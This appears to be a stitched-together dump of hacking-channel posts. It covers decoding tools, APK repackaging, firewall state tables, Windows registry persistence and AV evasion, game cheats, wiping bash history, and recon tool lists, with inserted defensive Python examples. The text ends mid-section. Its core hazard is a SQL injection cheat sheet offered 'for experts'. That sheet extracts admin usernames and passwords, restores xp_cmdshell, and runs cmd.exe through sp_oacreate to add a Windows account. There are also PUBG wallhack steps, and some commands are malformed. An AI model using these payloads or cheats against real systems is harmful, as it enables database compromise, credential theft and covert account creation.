UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 NEW 2020 DECRYPTION TOOL:
Ciphey aims to be a tool that automates many decryptions and decodings, such as multiple base encodings, classical ciphers, hashes and more advanced cryptography.


FEATURES:

1) 30+ encryptions supported, including encodings (binary, base64) and ordinary encryptions such as the Caesar cipher, repeating-key XOR and more.

2) Custom-built artificial intelligence with Augmented Search (AuSearch) for answering the question "what encryption was used?", so that decryptions take less than 3 seconds.

3) Custom-built natural language processing module: Ciphey can determine whether something is plaintext or not. Whether that plaintext is JSON, a CTF flag or English, Ciphey can recognise it in a couple of milliseconds.

4) Multi-language support: at present only German and English (with AU, UK, CAN and USA variants).

5) Supports encryptions and hashes which alternatives such as CyberChef Magic do not.

6) C++ core: blazingly fast.

INSTALLATION & RUN:

1) git clone https://github.com/Ciphey/Ciphey.git

2) cd Ciphey

3) There are three ways to run Ciphey:

File input: ciphey -f encrypted.txt

Unqualified input: ciphey -- "Encrypted input"

Normal way: ciphey -t "Encrypted input"

To get rid of the progress bars, the probability table and the rest of the noise, use quiet mode:

ciphey -t "encrypted text here" -q

For a full list of arguments, run ciphey --help.

Don't copy our tutorials.
Use for learning.

🦑 ANDROID APP REVERSE ENGINEERING:

1) Download the app from the app store or install it from elsewhere.

2) Find the target app and pull its APK from the Android device.

3) Decompile the APK with apktool
(https://ibotpeaches.github.io/Apktool/)

4) Extract the source code from the app with jadx
(https://github.com/skylot/jadx)

5) Make a small change to check that the rebuild works.

6) Compile the code with apktool to build an app
(https://ibotpeaches.github.io/Apktool/)

7) Sign the app with a key.

8) Install the app with adb or manually.
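Why step 7 is unavoidable, as an added example that is not part of the original post: the per-file digests recorded in META-INF/MANIFEST.MF (the v1 APK signing scheme) stop matching as soon as a file has been patched, so an integrity check like the one below flags any entry changed after signing. It verifies only the manifest against the contents, not the signature over the manifest (the .SF and .RSA files), and the sample APK it inspects is constructed inside the script.

```python
import base64
import hashlib
import io
import zipfile


def parse_manifest(text):
    """Return {entry name: base64 SHA-256 digest} from a MANIFEST.MF body.
    Long lines are wrapped with a leading-space continuation, so unfold first."""
    unfolded = []
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]
        else:
            unfolded.append(line)
    digests, name = {}, None
    for line in unfolded:
        if not line:                      # a blank line ends a section
            name = None
        elif line.startswith("Name: "):
            name = line[len("Name: "):]
        elif line.startswith("SHA-256-Digest: ") and name is not None:
            digests[name] = line[len("SHA-256-Digest: "):]
    return digests


def verify_apk(apk_bytes):
    """Recompute each entry's digest and compare it with the manifest.
    Returns a report with 'ok', 'modified' and 'unlisted' entry names."""
    report = {"ok": [], "modified": [], "unlisted": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        manifest = parse_manifest(zf.read("META-INF/MANIFEST.MF").decode())
        for info in zf.infolist():
            name = info.filename
            if name.startswith("META-INF/") or name.endswith("/"):
                continue      # signature files and directories are not listed
            expected = manifest.get(name)
            if expected is None:
                report["unlisted"].append(name)
                continue
            digest = base64.b64encode(hashlib.sha256(zf.read(name)).digest()).decode()
            report["ok" if digest == expected else "modified"].append(name)
    return report


def build_sample_apk(tamper=False):
    """Constructed sample (not a real app): two entries plus a manifest computed
    for the original contents. With tamper=True classes.dex is swapped after
    the manifest was written, as a rebuild without re-signing would do."""
    files = {
        "classes.dex": b"dex\n035\x00original bytecode",
        "res/values/strings.xml": b"<resources/>",
    }
    lines = ["Manifest-Version: 1.0", ""]
    for name, content in files.items():
        digest = base64.b64encode(hashlib.sha256(content).digest()).decode()
        lines += [f"Name: {name}", f"SHA-256-Digest: {digest}", ""]
    if tamper:
        files["classes.dex"] = b"dex\n035\x00patched bytecode"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "\r\n".join(lines))
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()
```

Real APKs may carry SHA1-Digest lines instead and, from v2 onward, a signing block outside the zip entries; the manifest check above covers the v1 scheme only.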


🦑 First, how stateful monitoring works:

1) Whenever the firewall receives a SYN packet (TCP connection initialization), it checks that SYN packet against its rule base.

2) The packet is compared with the rules in sequence. If the packet has not been accepted after all the rules have been checked, the connection is rejected.

3) In that case a RST packet is sent to the remote machine. If the packet is accepted, the session is recorded in the state monitoring table, which is kept in kernel mode. Subsequent packets (those without a SYN flag) are compared with the contents of the state table: if the session is in the table and the packet is part of that session, the packet is accepted; if it is not part of the session, the packet is discarded.

4) This improves the performance of the system, because ordinary data packets are compared with the state table rather than with the rule base; only a SYN packet is compared with the rule base. All comparisons between data packets and the state table are performed in kernel mode, so they should be fast.

🦑 How is the state monitoring table established?

1) So is it acceptable to use an ACK packet to initialize a connection? What happens then?

2) If the firewall's state table lets an ACK packet establish a session, it is incorrect.

3) Consider this design: if a packet is not in the state table, it is checked against the rule base regardless of whether it is a SYN, an ACK or any other packet, and if the rule base passes it, the session is added to the state table. All subsequent packets are then compared with the state table and passed; because an entry now exists, they are never checked against the rules again. The timeout of state table entries also has to be considered. With this design, some simple DoS attacks will defeat the firewall very effectively.

🦑 So how should the state inspection table be established?

1) First, what do we use to distinguish a session? In the simplest terms, the source address, destination address and port numbers decide whether packets belong to one session.

2) When a session is established by a SYN packet, the firewall first compares the packet with the rule base. If the connection request is passed, it is added to the state table, and a timeout value must be set at this point. Following the value used by CHECK-POINT FW-1, set it to 60 seconds.

3) The firewall then expects a return packet confirming the connection. When it receives one, it sets the connection timeout to 3600 seconds. The type of the returned packet must be checked: it has to carry the SYN/ACK flags. (Note: the timeout values should be configurable by the user.)

4) When performing state monitoring, a session can only be identified by source address, destination address and port numbers. If the performance requirements allow it, the sequence numbers of the TCP connection should also be tracked, although this may consume more resources.
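The table described above, as an added Python model that is not part of the original post: only SYN packets consult the rule base, an accepted SYN gets a 60-second entry that is extended to 3600 seconds when the SYN/ACK arrives, every other packet is matched against the table alone, and entries expire. The flag ack_creates_session reproduces the incorrect variant from the second part, where a bare ACK can open a session; all names and the rule format are the example's own.

```python
from dataclasses import dataclass

SYN_TIMEOUT = 60            # seconds, the CHECK-POINT FW-1 value quoted above
ESTABLISHED_TIMEOUT = 3600  # seconds, set once the SYN/ACK has been seen


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset  # subset of {"SYN", "ACK", "RST", "FIN"}


def session_key(pkt):
    """A session is identified by addresses and ports only, as in the text;
    both directions of the same connection map to one key."""
    a, b = (pkt.src, pkt.sport), (pkt.dst, pkt.dport)
    return (a, b) if a <= b else (b, a)


class StatefulFirewall:
    def __init__(self, rules, ack_creates_session=False):
        # rules: [(dst_ip or "*", dst_port or "*", "accept" | "reject")];
        # first match wins, and no match means reject.
        self.rules = rules
        self.table = {}            # session_key -> expiry time
        self.ack_creates_session = ack_creates_session
        self.rst_sent = []         # packets answered with RST

    def _rule_base_accepts(self, pkt):
        for dst, dport, action in self.rules:
            if dst in ("*", pkt.dst) and dport in ("*", pkt.dport):
                return action == "accept"
        return False

    def _expire(self, now):
        for key in [k for k, exp in self.table.items() if exp <= now]:
            del self.table[key]

    def handle(self, pkt, now):
        """Return 'accept', 'reject' (RST sent) or 'drop' for one packet."""
        self._expire(now)
        key = session_key(pkt)
        if "SYN" in pkt.flags and "ACK" not in pkt.flags:
            if self._rule_base_accepts(pkt):
                self.table[key] = now + SYN_TIMEOUT
                return "accept"
            self.rst_sent.append(pkt)
            return "reject"
        if key in self.table:
            if {"SYN", "ACK"} <= pkt.flags:   # the confirming return packet
                self.table[key] = now + ESTABLISHED_TIMEOUT
            return "accept"
        # No entry: a correct implementation drops without consulting the rules.
        if self.ack_creates_session and self._rule_base_accepts(pkt):
            self.table[key] = now + ESTABLISHED_TIMEOUT
            return "accept"
        return "drop"


def demo():
    """Walk one handshake through the table and show the two failure modes."""
    rules = [("10.0.0.5", 443, "accept")]
    client, server = ("192.0.2.10", 40000), ("10.0.0.5", 443)
    syn = Packet(*client, *server, frozenset({"SYN"}))
    synack = Packet(*server, *client, frozenset({"SYN", "ACK"}))
    ack = Packet(*client, *server, frozenset({"ACK"}))
    stray_ack = Packet("192.0.2.99", 5000, *server, frozenset({"ACK"}))

    fw = StatefulFirewall(rules)
    handshake = [fw.handle(syn, 0), fw.handle(synack, 1), fw.handle(ack, 2)]
    stray = fw.handle(stray_ack, 3)       # no session: dropped, rules unused
    slow = StatefulFirewall(rules)
    slow.handle(syn, 0)
    late = slow.handle(ack, 61)           # the SYN entry expired after 60 s
    wrong = StatefulFirewall(rules, ack_creates_session=True)
    bogus = wrong.handle(stray_ack, 0)    # incorrect variant: ACK opens a session
    return handshake, stray, late, bogus
```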

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity

🦑 HIDDEN MALWARE FOR WINDOWS IN THE REGISTRY:

INVISIBLE PERSISTENCE

Malware that runs without elevated privileges on Windows has limited ability to survive a system reboot (this ability is called persistence).

Malware that elevates privileges using zero-day exploits or public exploits has more potential to persist.

However, zero-days are expensive and using them risks exposing them, and public exploits will not work on patched systems.

Most malware ends up using well-known persistence methods that are easy to detect.

The easiest persistence method is to write a value to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (or the similar key under HKEY_LOCAL_MACHINE).

The values of this key are commands that Windows executes when the user logs on (in the case of HKEY_CURRENT_USER) or when the system boots (in the case of HKEY_LOCAL_MACHINE).

The malicious program writes the path to its executable into the Run key, so that it resumes execution after a reboot.

Since this is a well-known method, a suspicious value in the Run key is a red flag indicating that the system is infected.

It also reveals the location of the malware on the system, making it very easy to collect samples for analysis.
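The "red flag" check from the defender's side, as an added example that is not part of the original post: it lists the Run key values and flags those that start a program from a user-writable folder, invoke a script host, or carry an encoded command line. On Windows the entries are read with the standard winreg module; elsewhere the constructed sample entries are used, and the heuristics and names are the example's own.

```python
import re
import sys

RUN_KEYS = (
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\Run"),
)
# Heuristics: programs started from user-writable folders, script hosts and
# encoded command lines are what makes a Run value suspicious in practice.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\tmp\\", "\\programdata\\",
                 "\\users\\public\\", "\\downloads\\", "%appdata%",
                 "%localappdata%", "%temp%", "%tmp%")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}
ENCODED = re.compile(r"(?i)(?:\s-enc(?:odedcommand)?\b|frombase64string)")


def executable_of(command):
    """Program path of a Run value: a quoted path, else the first token
    ending in .exe, else the first whitespace-separated token."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    m = re.match(r"(.*?\.exe)\b", cmd, re.IGNORECASE)
    return m.group(1) if m else (cmd.split()[0] if cmd else "")


def classify(command):
    """Return the reasons a Run value looks suspicious (empty list = clean)."""
    reasons = []
    exe = executable_of(command).lower()
    if any(marker in exe for marker in USER_WRITABLE):
        reasons.append("runs from a user-writable location")
    if exe.replace("\\", "/").rsplit("/", 1)[-1] in SCRIPT_HOSTS:
        reasons.append("autorun invokes a script host or LOLBin")
    if ENCODED.search(command):
        reasons.append("encoded command line")
    return reasons


def read_run_keys():
    """Windows only: enumerate both Run keys with the standard winreg module."""
    import winreg
    roots = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    entries = []
    for root, path in RUN_KEYS:
        try:
            with winreg.OpenKey(roots[root], path) as key:
                index = 0
                while True:
                    try:
                        name, value, _ = winreg.EnumValue(key, index)
                    except OSError:
                        break
                    entries.append((root + "\\" + path, name, str(value)))
                    index += 1
        except OSError:
            continue
    return entries


# Constructed sample entries (not taken from a real host); the base64 is "ABC".
SAMPLE_ENTRIES = [
    ("HKLM\\...\\Run", "SecurityHealth",
     r"C:\Windows\system32\SecurityHealthSystray.exe"),
    ("HKCU\\...\\Run", "OneDriveSetup",
     r'"C:\Users\alice\AppData\Local\Temp\svch0st.exe" /silent'),
    ("HKCU\\...\\Run", "Updater",
     r"powershell.exe -nop -w hidden -enc QQBCAEMA"),
]


def audit(entries=None):
    """Return [(key, value name, reasons)] for the suspicious entries only."""
    if entries is None:
        entries = read_run_keys() if sys.platform == "win32" else SAMPLE_ENTRIES
    findings = []
    for key, name, command in entries:
        reasons = classify(command)
        if reasons:
            findings.append((key, name, reasons))
    return findings
```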

FILELESS BINARY STORAGE

CONVENTIONAL STORAGE OF FILES ON DISK

Antivirus software scans files on the disk.

Antivirus software hashes files and sends the signatures to the cloud.

Some antivirus products perform heuristic scans of files stored on the disk.

Suspected malware files can even be silently uploaded to the cloud.

To counter this, malware has several options.

The files on disk can be plain droppers that connect to the Internet and load the more important modules (which are loaded into memory without touching the disk).

Malicious programs can also craft the executable files they store on disk so that they do not trip antivirus heuristics.

For example, because antivirus often scans for high-entropy segments in a PE file (which indicate compressed or encrypted data), malware can avoid using encryption and compression to protect its executables.

Since antivirus heuristics also scan import tables, malware can avoid importing suspicious functions.

Such countermeasures are burdensome for malware developers and, in any case, do not guarantee that their binaries will not be uploaded to the cloud.

» DOWNLOAD & USAGE:

https://github.com/outflanknl/SharpHide#usage


🦑 Five ways to unlock your Android smartphone with gloves and a mask:

1) Add a trusted Bluetooth device
If you are wearing a smartwatch or fitness band, you can use it to unlock your smartphone. In this case you can leave the reliable biometric protection and PIN code on the lock screen enabled, while the wearable device lets you unlock the phone easily.

To activate it, open Settings > Security > Smart Lock > Trusted devices. Make sure Bluetooth is turned on on your phone and select Add Trusted Device. You will see a list of Bluetooth devices you have connected to before. Select your smartwatch or fitness band and add it.

2) Use the iris scanner on older Samsung flagships
If you have one of the Samsung smartphones listed below, there is an additional biometric authentication method that a mask and gloves do not interfere with: the iris scanner. It is enabled under Settings > Biometrics & Security > Iris Scanner > Register Shell.

3) Use the ultrasonic scanner on Samsung's newer flagships
If you have the latest generation of Samsung flagship smartphones, there is an ultrasonic fingerprint scanner under the screen. Unlike the optical fingerprint scanners on other smartphones, it uses high-frequency sound to create a clear image of your finger, and this sound can pass through thin materials, including the latex of protective gloves.

Samsung Galaxy S10
Samsung Galaxy S10+
Samsung Galaxy Note10
Samsung Galaxy Note10+
Samsung Galaxy S20
Samsung Galaxy S20+
Samsung Galaxy S20 Ultra

4) Body recognition
If you don't have a smartwatch, a fitness band or a Samsung flagship smartphone, there are still options. Open Settings > Security > Smart Lock > Body recognition.

Once activated, the smartphone stays unlocked while it detects your movement, for example while you hold it in your hand or carry it in your pocket or wallet. If the device is lying on a table and you are not nearby, it is locked against strangers.

5) Use a gesture instead of a password or PIN
If you use manual authentication methods such as a password or PIN, you can switch to a lock-screen gesture and save time. It is less secure than a password, but it takes only one movement; you don't need finger dexterity, just take one finger out of the glove.

Open Settings > Security > Lock screen, select Pattern and follow the instructions.

🦑 Parrot / Kali: Metapackages and Virtual Packages:
#UnderstandingLinux

It is important to clearly distinguish between metapackages and virtual packages. The former are real packages (including real .deb files) whose sole purpose is to express dependencies.

Virtual packages, however, do not physically exist; they are only a means of identifying real packages by a common logical criterion (for example, the services they provide, or compatibility with a standard program or an existing package). Sometimes virtual packages are used as short, convenient or more commonly used aliases for real packages.

🦑 List of Kali Linux Metapackages

System:

1) kali-linux-core : A basic Kali Linux system; the core elements that are always present in any installation

2) kali-linux-default : The "standard" system images you can download from the download page (AMD64 / i386) include the tools of this metapackage

3) kali-linux-light : Used to create the Kali-Light image, a light version of the system

4) kali-linux-arm : All tools suitable for ARM devices

5) kali-linux-nethunter : Tools used as part of Kali NetHunter

Desktop environments / window managers:

Desktop environments are full-fledged graphical shells like GNOME, Cinnamon, KDE, XFCE and others.

Window managers perform only some of the functions of a graphical interface: in effect they only let you open several windows, add a desktop background and perhaps have a simple menu. Thanks to this simplicity, window managers consume a minimum of resources, but in terms of user convenience they are inferior to a full-fledged desktop environment.

6) kali-desktop-core : Any key tools needed to display the GUI

7) kali-desktop-e17 : Enlightenment (window manager)

8) kali-desktop-gnome : GNOME (desktop environment)

9) kali-desktop-i3 : i3 (window manager)

10) kali-desktop-kde : KDE (desktop environment)

11) kali-desktop-lxde : LXDE (window manager)

12) kali-desktop-mate : MATE (desktop environment)

13) kali-desktop-xfce : XFCE (window manager)

Tools:

14) kali-tools-gpu : Tools that work best when you have GPU access

15) kali-tools-hardware : Hardware hacking tools

16) kali-tools-crypto-stego : Tools based on cryptography and steganography

17) kali-tools-fuzzing : For fuzzing protocols

18) kali-tools-802-11 : 802.11 (commonly known as "Wi-Fi")

19) kali-tools-bluetooth : For targeting Bluetooth devices

20) kali-tools-rfid : RFID tools

21) kali-tools-sdr : Software-defined radio tools

22) kali-tools-voip : Voice over IP tools

23) kali-tools-windows-resources : Any programs that can run on Windows hosts

🦑 PUBG best hacks:

1) First, you need to install ZAchiever on your mobile phone, which helps you to start the process for your game.

2) Then you have to extract the PUBG Hacking Script file on your Android, which is used to start the hacking process.

3) Next, you have to download Game Guardian, Strange VPN and the PUBG game so that you can select the hack schemes.

4) After this, you have to open Dual Space and make clones of the PUBG Mobile game and Game Guardian.

5) Then you have to open Game Guardian and select the hacking script to execute for the hacking process. You must select a script: without a script the process will not proceed.

6) Finally, open the PUBG game on your mobile, and you will see a Game Guardian icon floating on the screen. By tapping that icon you can perform various tasks in the game, such as wallhack, automatic headshots and many more. There are many other hacks you can apply after hacking the game, such as changing the player's body colour, high damage to enemies, etc.

7) After completing these steps your hacking setup is ready, and now you can hack any PUBG game and perform different tasks.

8) There are various tools available to hack the game, but if you follow these steps they will help you get a properly hacked game.

5 wiki resources same way :)

🦑 WEB EXPLOITS FREE COURSES:

[WebSploit](https://websploit.h4cker.org/) is a virtual machine (VM) created by [Omar Santos](https://omarsantos.io) for the different cybersecurity ethical hacking (web penetration testing) training sessions delivered at [DEFCON](https://www.wallofsheep.com/blogs/news/packet-hacking-village-workshops-at-def-con-26-finalized), [Live Training in Safari](https://www.safaribooksonline.com/search/?query=omar%20santos&extended_publisher_data=true&highlight=true&is_academic_institution_account=false&source=user&include_assessments=false&include_case_studies=true&include_courses=true&include_orioles=true&include_playlists=true&formats=live%20online%20training&sort=relevance), [video on demand LiveLessons](https://www.safaribooksonline.com/search/?query=omar%20santos&extended_publisher_data=true&highlight=true&is_academic_institution_account=false&source=user&include_assessments=false&include_case_studies=true&include_courses=true&include_orioles=true&include_playlists=true&formats=video&sort=relevance) and others.

The purpose of this VM is to have a lightweight single VM with a few web application penetration testing tools as well as vulnerable applications.


πŸ¦‘πŸ§ How to clear bash history on logout:

How do I automatically clear the GNU Bourne-Again SHell history when exiting the shell?

1) Disable the HISTFILE shell variable at login to prevent command history from being saved when you exit the shell.

$ echo "unset HISTFILE" | sudo tee /etc/profile.d/unset_histfile.sh
Optionally, set the HISTSIZE shell variable to 0 at logon so that commands executed are not stored in the history list.
Attention, this is very inconvenient, as it will completely disable the history in the login shell.
$ echo "HISTSIZE = 0" | sudo tee /etc/profile.d/disable_histsize.sh
Create a /etc/bash.bash_logout file to execute when the shell exits.

Use it to clear history.

2) Don't worry, it will be executed after a separate login shell cleanup file ~ / .bash_logout.

$ echo "history -c" | sudo tee /etc/bash.bash_logout
Note, it will not write an empty history list to the history file.

3) Adding a second command to write the history list to the history file will not work since the HISTFILE shell variable has not been set.
This also means that the history list will not be initialized from the history file on startup.
Delete the existing ~ /.bash_history file to keep everything in order.
But be aware of other users.

4) You can always save the history list to a special file.

Note that this will add the current history list to the file.
$ HISTFILE = session_history.txt history -w
$ cat session_history.txt
cat .bash_history
HISTFILE = session_history.txt history -w


🦑 WHAT IS THE NEPTUNE EXPLOIT KIT:

1) The Neptune exploit kit has been seen in a campaign distributing a malicious miner, as reported by experts from the firm FireEye. Neptune, also known as Terror, Blaze and Eris, was originally thought to be a variant of the Sundown exploit kit because of the similarity of their code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.

2) Neptune has gained popularity and is still used in malvertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye has recently discovered several changes in Neptune attacks, including its URI patterns, landing pages and malicious payload.

3) The attackers use a legitimate pop-up ad service to spread the malware. The cybercriminals also disguise their sites by changing the top-level domain from .com to .club. One such malicious site also mimics a YouTube video to MP3 converter.



🦑 BUG HUNTER full:

Information Gathering
Mapping
Discovery
Exploitation
PoCs & Reporting

Information Gathering:
Basic Commands for Information Gathering
Masscan - TCP Port Scanner
DNS Recon - DNS Enumeration
Sublist3r - Find Subdomains
Alt-DNS - Subdomain Discovery
Amass - In-Depth DNS Enumeration
Subfinder - Subdomain Discovery Tool
Enumall - Setup Script for Recon-NG
Aquatone - Reconnaissance on Domain Names
Cloudflare_Enum - Cloudflare DNS Enumeration
InfoG - Information Gathering Tool
The Harvester - E-mail, SubDomain, Ports etc.
Recon-NG - Web Reconnaissance Framework
SetoolKit - Social Engineering Toolkit
WhatWeb - Next Generation Web Scanner
Maltego - Interactive Data Mining Tool
Mapping :
Nmap - IP's, Open Ports and Much More
Firefox - Web Browser
Firefox Browser Extensions
Burp Suite Pro
Burp Suite Extensions
Intruder Payloads for Burp Suite
Payloads All The Things
Discovery :
Acunetix-WVS
Arachni
Burp Suite
Nexpose
Nikto
Vega
Wapiti
Web Security Scanner
Websecurify Suite
Joomscan
w3af
Zed Attack Proxy
WP-Scan
FuzzDB
CeWL
Exploitation :
XSS :

XSS Radar
XSSHunter
xssHunter Client
DOMxssScanner
XSSer
BruteXSS
XSStrike
XSS'OR
SQLi :

SQLmap
XXE :

OXML-xxe
XXEinjextor
SSTI :

Tplmap
SSRF :

SSRF-Detector
Ground Control
LFI :

LFISuit
Mobile :

MobSF
GenyMotion
Apktool
dex2jar
jd-gui
idb
Other :

Gen-xbin-Avi
GitTools
DVCS Ripper
TKO Subs
SubBruteforcer
Second-Order
Race The Web
CORStest
RCE Struts-pwn
ysoSerial
PHPGGC
Retire-js
Getsploit
Findsploit
BFAC
WP-Scan
CMSmap
Joomscan
JSON W T T
Wfuzz
Patator
Netcat
ChangeMe
wappalyzer
builtwith
wafw00F
LinkFinder
PoCs & Reporting
Bug Bounty Platforms
POCs (Proof of Concepts)
CheatSheet
EyeWitness
HttpScreenshot
BugBountyTemplates
Template Generator

INSTALLATION & RUN:

1) git clone https://github.com/thehackingsage/bughunter.git

2) cd bughunter && chmod +x bughunter.py && sudo cp bughunter.py /usr/bin/bughunter

That's it. Type bughunter in a terminal to run the tool.

Video Tutorial : https://www.youtube.com/watch?v=opvQIgUD0Jc&t=18s


🦑 AdAudit - PowerShell script to automate domain auditing:

FEATURES:

What does it do?

Device information: Get-HostDetails
Domain audit: Get-MachineAccountQuota, Get-SMB1Support, Get-FunctionalLevel, Get-DCsNotOwnedByDA
Domain trust audit: Get-DomainTrusts
User account audit: Get-InactiveAccounts, Get-DisabledAccounts, Get-AdminAccountChecks, Get-NULLSessions, Get-AdminSDHolders, Get-ProtectedUsers
Password information audit: Get-AccountPassDontExpire, Get-UserPasswordNotChangedRecently, Get-PasswordPolicy
Dumps NTDS.dit: Get-NTDSdit
Object audit: Get-OldBoxes
GPO audit (including checking SYSVOL for passwords): Get-GPOtoFile, Get-GPOsPerOU, Get-SYSVOLXMLS
Check general permissions of AD groups: Get-OUPerms
Check for LAPS on the domain: Get-LAPSStatus
Check for authentication policies and silos: Get-AuthenticationPoliciesAndSilos

Launch arguments

The following flags can be used when running the script:

-hostdetails retrieves the hostname and other useful audit information
-domainaudit retrieves AD information such as the functional level
-trusts retrieves information about any trust relationships of the domain
-accounts identifies account problems such as expired, disabled, etc.
-passwordpolicy returns password policy information
-ntds dumps the NTDS.dit file using ntdsutil
-oldbox identifies legacy OSs like XP / 2003 joined to the domain
-gpo outputs GPOs in XML and HTML for later analysis
-uperms checks for common OU permission issues
-laps checks whether LAPS is installed
-authpolsilos checks for the existence of authentication policies and silos
-all runs all checks, e.g. AdAudit.ps1 -all


DOWNLOAD:
https://github.com/phillips321/adaudit


🦑 FOR EXPERTS: ASP+PHP standard SQL injection statements:

1) Determine whether there is an injection point
'; and 1=1 and 1=2

2) Guess the table name. In general it is nothing more than admin, adminuser, user, pass, password, etc.
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin)   (judges whether the admin table exists)

3) Guess the number of accounts. If 0< returns the correct page and 1< returns the error page, the number of accounts is 1.
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)

4) Guess the field names by putting the field name we have in mind inside the len() brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(user field name)>0)
and 1=(select count(*) from admin where len(password field name password)>0)

5) Guess the length of each field: change the value after > until the correct page is returned.

and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)
and 1=(select count(*) from admin where len(name)>5)
and 1=(select count(*) from admin where len(name)=6)

and 1=(select count(*) from admin where len(password)>11)
and 1=(select count(*) from admin where len(password)>12)
and 1=(select count(*) from admin where len(password)=12)


🦑 Guess the characters

6) and 1=(select count(*) from admin where left(name,1)='a')
and 1=(select count(*) from admin where left(name,2)='ab')-
Add one character at a time and keep guessing like this. Once you have guessed as many characters as the length found above, the guess is correct and the account name is recovered.

and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
This query can also guess user names and passwords in Chinese: just change the number after = to the ASCII code of the character, and finally convert the result back into characters.
'group by users.id having 1=1--
'group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--

7) Look at the server patch level: an error here means the SP4 patch has been applied.

and 1=(select @@VERSION)--
Look at the permissions of the database connection account: a normal page proves that it has the sysadmin server role.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

8) Determine the account used to connect to the database. (If the connection uses the SA account, a normal page proves that the connected account is SA.)

and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name()--
See whether xp_cmdshell has been deleted:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')--
If xp_cmdshell has been deleted, restore it; restoring from an absolute path is also supported:
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--

9) Reverse PING (own experiment)

;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

10) Add an account


;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
Create a virtual directory E:
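Detection logic for the probes listed in this section, added here as an example and not part of the original post: it URL-decodes the request URI of each web server access log line (constructed sample lines in Apache combined format), reports which stage of the cheat sheet a request resembles, and groups the hits per client IP, since one source walking through the staged guesses is what stands out in the logs. The rule labels, log format and sample lines are the example's own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Each rule is labelled with the stage of the cheat sheet it corresponds to.
RULES = [
    ("boolean probe",       r"\band\s+\d+\s*[=<>]+\s*\(\s*select\b"),
    ("column/length guess", r"\b(?:len|left|mid|asc)\s*\("),
    ("union enumeration",   r"\bunion\s+select\b"),
    ("schema enumeration",  r"\binformation_schema\b"),
    ("group-by/having",     r"\bgroup\s+by\b.*\bhaving\b"),
    ("server fingerprint",  r"@@version|\bis_srvrolemember\s*\(|\bsystem_user\b|\buser_name\s*\("),
    ("xp_cmdshell",         r"\bxp_cmdshell\b|\bsp_addextendedproc\b"),
    ("OLE automation",      r"\bsp_oacreate\b|\bsp_oamethod\b"),
]
COMPILED = [(label, re.compile(pattern, re.IGNORECASE)) for label, pattern in RULES]

# Apache/nginx combined log format: client, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r"(?P<status>\d{3})"
)


def normalise(uri):
    """Decode percent/plus encoding twice (to unwrap double encoding) and
    collapse whitespace so the patterns match the SQL as the server saw it."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(uri)))


def inspect_line(line):
    """Parse one log line; return None if unparsable, else a dict with the
    client IP, raw URI, status and the list of rule labels that matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = normalise(m["uri"])
    hits = [label for label, rx in COMPILED if rx.search(decoded)]
    return {"ip": m["ip"], "uri": m["uri"], "status": m["status"], "hits": hits}


def summarise(log_text):
    """Group matching requests per client IP, in log order."""
    per_ip = {}
    for line in log_text.splitlines():
        result = inspect_line(line)
        if result and result["hits"]:
            per_ip.setdefault(result["ip"], []).append(result["hits"])
    return per_ip


# Constructed sample log lines (not real traffic); the probes mirror steps 3, 5, 7 and 8.
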